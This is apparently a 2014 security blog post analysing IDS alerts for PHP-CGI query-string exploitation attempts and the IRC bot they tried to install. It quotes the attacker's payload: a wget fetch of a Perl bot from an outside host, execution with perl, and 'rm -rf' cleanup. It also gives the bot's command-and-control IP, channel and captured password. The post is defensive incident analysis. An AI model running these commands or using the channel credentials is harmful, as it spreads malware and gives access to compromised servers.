Saturday, April 26, 2014

Examining IDS Logs for PHP-CGI Query String Vulnerabilities

I noticed a few high severity events related to PHP-CGI Query String vulnerabilities going through the IDS and bouncing off of the webserver.

The first item was identifying it in the IDS as one of the below events:
ET Web_Specific_Apps PHP-CGI query string parameter vulnerability - CVE2012-1823

I am not necessarily going to focus on the exploit.  I want to focus on the information in the below screenshot:

As you can see part of the vulnerability is to execute the following commands through php:
cd /tmp - Change to the /tmp directory
wget http://www.macam-informasi.com/bibah/bot.txt - Download using wget the bot.txt
perl bot.txt  - Use perl and execute the text file bot.txt that was previously downloaded
rm -rf bot.txt - Remove the bot.txt if in the process of execution perl bot.txt terminates
rm -rf bot.txt* - Remove anything that starts with bot.txt possibly due to temporary files that are created
rm -rf *.txt - Remove any temporary *.txt files that were created
rm -rf * - Remove any files int eh /tmp directory 

What if we submit the URL that is downloading bot.txt to virustotal?

What if we submit the file that is downloaded to virustotal?

Looking closer at the IRC bot that is executed:

As we can see from the first few lines the IRC channel that it connects to is #total, at IP Address 204.44.120.36, and later you find that the connection occurs over port 80.

Searching for the IP Address of 204.44.120.36 on arin.net we find:

I have a virtual machine that I am going to execute this bot.txt from and then capture the traffic going to this IRC channel:

As shown in the packet capture it joins the IRC channel of #total with probably a password of "muietie".  It is also observed the below DNS name is used for the IRC server:

If you log in manually to the IRC channel with the password that was captured:
You can see that 244 people are in the room or these are the servers that have been infected with the PHP-CGI vulnerability.

Looking closer at my connection in the room and checking the info it displays additional information about the connection:

From the channel they can interact with the Perl bot through the IRC channel commands.  This would allow them to remotely control the server.  They would also understand that the server that is in the list is vulnerable to the PHP-CGI vulnerability and could exploit it in the future.

I have sent an email to the ISP to report this activity but wanted to document an instance of this that has been observed through checking the IDS logs.

Here is the email back from their abuse department:

abuse-ticket@quadranet.com


to me
Your abuse report has been submitted to our Abuse Department.

Our typical reaction time is 72 hours. If your abuse issue isn't handled within 96 hours please respond to this message.


Abuse Ticket Number: 881046











No comments:

Post a Comment

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...